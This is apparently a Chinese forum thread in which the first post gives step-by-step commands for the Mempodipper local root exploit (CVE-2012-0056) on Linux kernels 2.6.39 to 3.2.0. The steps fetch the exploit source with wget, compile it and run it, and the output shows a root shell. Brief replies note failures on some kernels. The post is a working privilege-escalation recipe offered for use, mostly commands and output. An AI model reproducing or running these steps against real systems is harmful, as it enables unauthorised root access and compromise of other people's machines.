Linux 2.6.39 到 3.2.0 爆提权漏洞

master

1.下载漏洞利用文件


wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c

2.编译

gcc mempodipper.c -o mempodipper

3.执行前察看

netcat@netcat:~$ uname -r
3.0.0-12-generic
netcat@netcat:~$ cat /etc/issue
Ubuntu 11.10 n l

netcat@netcat:~$ uname -a
Linux netcat 3.0.0-12-generic #20-Ubuntu SMP Fri Oct 7 14:50:42 UTC 2011 i686 i686 i386 GNU/Linux
netcat@netcat:~$ id
uid=1000(netcat) gid=1000(netcat) 组=1000(netcat),4(adm),20(dialout),24(cdrom),46(plugdev),116(lpadmin),118(admin),124(sambashare)

4.执行
netcat@netcat:~$ ./mempodipper
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme’ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0×8049570.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/3012/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0×8049564.
[+] Executing su with shellcode.
sh-4.2#

效果自测！

有个就好

漂过。。。

oldghost

路过

Kvm

等咩咩在centos上测试

ivv

玩不懂。

HuPo

omg

lxfy

arch
3.2.8 失败……是必然的

windywinter

debian testing
kernel 3.1.0失败

qxwo

什么玩意,用一件包的人表示看不懂